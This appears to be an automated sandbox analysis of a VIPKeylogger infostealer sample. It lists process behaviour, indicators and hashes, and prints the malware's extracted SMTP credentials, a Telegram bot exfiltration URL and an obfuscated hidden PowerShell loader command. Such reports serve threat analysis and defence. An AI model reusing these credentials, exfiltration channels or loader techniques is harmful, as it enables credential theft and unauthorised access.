Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2025 14:36
Static task
static1
Behavioral task
behavioral1
Sample
f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
-
Size
764KB
-
MD5
ee18481e218cc9bc7a1628f5a7365776
-
SHA1
57ea302c84a488de1e5a5bcc669e02c5d9a7a350
-
SHA256
f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
-
SHA512
a4ae4e6f3d46c05141e1d60b3f92d1b2ad27d758ae27bc063fb3f5fef953237120480e700c5d05d90cc41d92497674c0e7d3e25dbd62e591445170077309f78b
-
SSDEEP
12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
Malware Config
Extracted
Protocol: smtp- Host:
mail.abraher.com - Port:
587 - Username:
[email protected] - Password:
General1
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.abraher.com - Port:
587 - Username:
[email protected] - Password:
General1 - Email To:
[email protected]
https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendMessage?chat_id=7171338311
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2516 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 2884 f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 10 IoCs
flow pid Process 22 5112 msiexec.exe 24 5112 msiexec.exe 26 5112 msiexec.exe 28 5112 msiexec.exe 32 5112 msiexec.exe 35 5112 msiexec.exe 44 5112 msiexec.exe 53 5112 msiexec.exe 56 5112 msiexec.exe 58 5112 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 checkip.dyndns.org 43 reallyfreegeoip.org 44 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 5112 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2516 powershell.exe 5112 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\devotee\Organosol.ini f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\resources\typhloalbuminuria\rekylgevrs.ini f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe File opened for modification C:\Windows\Fonts\ketoside.ref f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2516 powershell.exe 2516 powershell.exe 2516 powershell.exe 2516 powershell.exe 2516 powershell.exe 2516 powershell.exe 2516 powershell.exe 5112 msiexec.exe 5112 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2516 powershell.exe Token: SeIncreaseQuotaPrivilege 2516 powershell.exe Token: SeSecurityPrivilege 2516 powershell.exe Token: SeTakeOwnershipPrivilege 2516 powershell.exe Token: SeLoadDriverPrivilege 2516 powershell.exe Token: SeSystemProfilePrivilege 2516 powershell.exe Token: SeSystemtimePrivilege 2516 powershell.exe Token: SeProfSingleProcessPrivilege 2516 powershell.exe Token: SeIncBasePriorityPrivilege 2516 powershell.exe Token: SeCreatePagefilePrivilege 2516 powershell.exe Token: SeBackupPrivilege 2516 powershell.exe Token: SeRestorePrivilege 2516 powershell.exe Token: SeShutdownPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeSystemEnvironmentPrivilege 2516 powershell.exe Token: SeRemoteShutdownPrivilege 2516 powershell.exe Token: SeUndockPrivilege 2516 powershell.exe Token: SeManageVolumePrivilege 2516 powershell.exe Token: 33 2516 powershell.exe Token: 34 2516 powershell.exe Token: 35 2516 powershell.exe Token: 36 2516 powershell.exe Token: SeDebugPrivilege 5112 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2884 wrote to memory of 2516 2884 f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe 84 PID 2884 wrote to memory of 2516 2884 f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe 84 PID 2884 wrote to memory of 2516 2884 f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe 84 PID 2516 wrote to memory of 5112 2516 powershell.exe 98 PID 2516 wrote to memory of 5112 2516 powershell.exe 98 PID 2516 wrote to memory of 5112 2516 powershell.exe 98 PID 2516 wrote to memory of 5112 2516 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe"C:\Users\Admin\AppData\Local\Temp\f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\Admin\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5112
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD501e76fe9d2033606a48d4816bd9c2d9d
SHA1e46d8a9ed4d5da220c81baf5f1fdb94708e9aba2
SHA256ee052fd5141bf769b841846170aabf0d7c2bb922c74c623c3f109344534f7a70
SHA51262ef7095d1bf53354c20329c2ce8546c277aa0e791839c8a24108a01f9483a953979259e0ad04dbcab966444ee7cdd340f8c9557bc8f98e9400794f2751dc7e0
-
Filesize
333KB
MD5a01a7b6997298405d8db82d7019581b1
SHA1db88db262a5a9b901e79f164528dfce4dec096e1
SHA256b65ed13d031c96566dc34332bd1bc3ae757911bae5e348d9a8819905289f7620
SHA5125ceaf1bbe6a7bb3ba41568328a27803fe028f0d347345059a05ee2a980c84babf17734b4b9529ec6f847308a4c9ee5aa90e69194504d74273e8cee7507a787f3
-
Filesize
68KB
MD50751b57e7c9836548f433d8a91bbc582
SHA15f12a72da78da084e25b751b11a5e556cc88f6d5
SHA2567307eb64e3419383d4ec7bd555f85ee9ca56e0972d75fd74a8949f4e412448f7
SHA5122ee12bd05f884332a51587a3664488356c3149ea1971d9fd9bf474ef01ee2d78c01cd981130eb2bcd152eb3a685f4c6c385c4d4835e100510cd93ad6f43993a6